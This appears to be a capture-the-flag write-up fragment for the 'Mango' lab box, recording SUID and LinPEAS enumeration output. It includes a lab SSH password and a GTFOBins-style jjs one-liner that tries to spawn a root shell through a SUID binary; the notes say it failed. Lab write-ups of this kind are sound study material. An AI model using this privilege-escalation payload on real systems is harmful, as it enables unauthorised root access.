3 box enum mango

SuidEnum

# ssh mango:h3mXK8RhU~f{]f5H

[~] Custom SUID Binaries (Interesting Stuff)
------------------------------
/usr/bin/run-mailcap
/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
------------------------------

[#] SUID Binaries in GTFO bins list (Hell Yeah!)
------------------------------
 -~> https://gtfobins.github.io/gtfobins/jjs/#suid
------------------------------

[&] Manual Exploitation (Binaries which create files on the system)
------------------------------
[&] Jjs ( /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs )
echo "Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -pc \$@|sh\${IFS}-p _ echo sh -p <$(tty) >$(tty) 2>$(tty)').waitFor()" | /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
------------------------------
# tried exploitation; didnt work
-bash: /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs: Permission denied

-rwsr-sr-- 1 root admin 11K Jul 18  2019 /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
# we need to become admin to run this.

PEAS

╣ Sudo version
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.21p2

╣ Active Ports
tcp        0      0 127.0.0.1:27017         0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -

╣ Users with console
mango:x:1000:1000:mango:/home/mango:/bin/bash
root:x:0:0:root:/root:/bin/bash
admin:x:4000000000:1001:,,,:/home/admin/:/bin/sh
uid=4000000000(admin) gid=1001(admin) groups=1001(admin)

-rw-r--r-- 1 root root 626 Dec 19  2013 /etc/mongod.conf

Previous4 mango > admin Next2 :80 :443

Last updated 4 years ago